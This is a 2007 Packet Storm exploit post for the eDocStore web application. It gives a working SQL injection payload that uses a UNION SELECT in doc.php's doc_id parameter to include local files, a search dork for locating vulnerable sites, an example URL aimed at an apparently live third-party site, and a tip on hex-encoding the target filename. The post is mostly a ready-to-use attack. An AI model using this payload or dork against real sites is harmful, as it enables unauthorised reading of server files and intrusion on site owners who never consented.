edocstore-sql.txt

2007-06-26T00:00:00
ID PACKETSTORM:57296
Type packetstorm
Reporter t0pp8uzz
Modified 2007-06-26T00:00:00

Description

                                        
                                            `--==+================================================================================+==--  
--==+ eDocStore Latest Versions Local File Inclusion Vulnerbilitys +==--  
--==+================================================================================+==--  
  
  
AUTHOR: t0pP8uZz & xprog (good work xprog)  
  
SCRIPT DOWNLOAD: N/A  
  
SITE: http://www.edocstore.co.uk  
  
DORK: intext:"Powered by eDocStore"  
  
  
EXPLOITS:  
  
EXPLOIT 1: http://www.server.com/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null  
  
  
EXAMPLES:  
  
EXAMPLE 1: http://www.nwal.org/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null  
  
Note/Tip: The filename for the incluson has got to be hexed before you can include it.  
Its only required to replace the first hex value before the ","  
  
GREETZ: h4cky0u.org, G0t-Root.Net  
  
FROM GM: Kw3[R]ln Get over it!  
  
--==+================================================================================+==--  
--==+ eDocStore Latest Versions Local File Inclusion Vulnerbilitys +==--  
--==+================================================================================+==--  
  
`